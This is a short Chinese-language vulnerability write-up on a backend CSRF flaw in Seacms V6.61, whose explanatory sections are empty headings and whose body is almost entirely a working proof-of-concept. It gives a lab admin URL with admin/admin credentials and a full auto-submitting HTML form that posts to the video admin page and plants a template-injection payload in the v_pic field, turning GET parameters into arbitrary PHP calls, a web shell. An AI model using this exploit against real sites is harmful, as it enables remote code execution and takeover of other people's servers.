Seacms V6.61 后台csrf

一、漏洞简介

二、漏洞影响

三、复现过程

http://www.0-sec.org:10089/backend/,用户名和密码为admin | admin

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <!-- adjust action to your url -->
    <form action="http://www.0-sec.org/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
      <input type="hidden" name="v&#95;commend" value="0" />
      <input type="hidden" name="v&#95;name" value="getshell" />
      <input type="hidden" name="v&#95;enname" value="ceshi" />
      <input type="hidden" name="v&#95;color" value="&#35;FF0000" />
      <input type="hidden" name="v&#95;type" value="5" />
      <input type="hidden" name="v&#95;state" value="5" />
      <input type="hidden" name="v&#95;pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
      <input type="hidden" name="v&#95;spic" value="" />
      <input type="hidden" name="v&#95;gpic" value="" />
      <input type="hidden" name="v&#95;actor" value="" />
      <input type="hidden" name="v&#95;director" value="" />
      <input type="hidden" name="v&#95;commend" value="0" />
      <input type="hidden" name="v&#95;note" value="" />
      <input type="hidden" name="v&#95;tags" value="" />
      <input type="hidden" name="select3" value="" />
      <input type="hidden" name="v&#95;publishyear" value="" />
      <input type="hidden" name="select2" value="" />
      <input type="hidden" name="v&#95;lang" value="" />
      <input type="hidden" name="select1" value="" />
      <input type="hidden" name="v&#95;publisharea" value="" />
      <input type="hidden" name="select4" value="" />
      <input type="hidden" name="v&#95;ver" value="" />
      <input type="hidden" name="v&#95;hit" value="0" />
      <input type="hidden" name="v&#95;monthhit" value="0" />
      <input type="hidden" name="v&#95;weekhit" value="0" />
      <input type="hidden" name="v&#95;dayhit" value="0" />
      <input type="hidden" name="v&#95;len" value="" />
      <input type="hidden" name="v&#95;total" value="" />
      <input type="hidden" name="v&#95;nickname" value="" />
      <input type="hidden" name="v&#95;company" value="" />
      <input type="hidden" name="v&#95;tvs" value="" />
      <input type="hidden" name="v&#95;douban" value="" />
      <input type="hidden" name="v&#95;mtime" value="" />
      <input type="hidden" name="v&#95;imdb" value="" />
      <input type="hidden" name="v&#95;score" value="" />
      <input type="hidden" name="v&#95;scorenum" value="" />
      <input type="hidden" name="v&#95;longtxt" value="" />
      <input type="hidden" name="v&#95;money" value="0" />
      <input type="hidden" name="v&#95;psd" value="" />
      <input type="hidden" name="v&#95;playfrom&#91;1&#93;" value="" />
      <input type="hidden" name="v&#95;playurl&#91;1&#93;" value="" />
      <input type="hidden" name="m&#95;downfrom&#91;1&#93;" value="" />
      <input type="hidden" name="m&#95;downurl&#91;1&#93;" value="" />
      <input type="hidden" name="v&#95;content" value="" />
      <input type="hidden" name="Submit" value="�&#161;&#174;�&#174;&#154;�&#143;&#144;浜&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>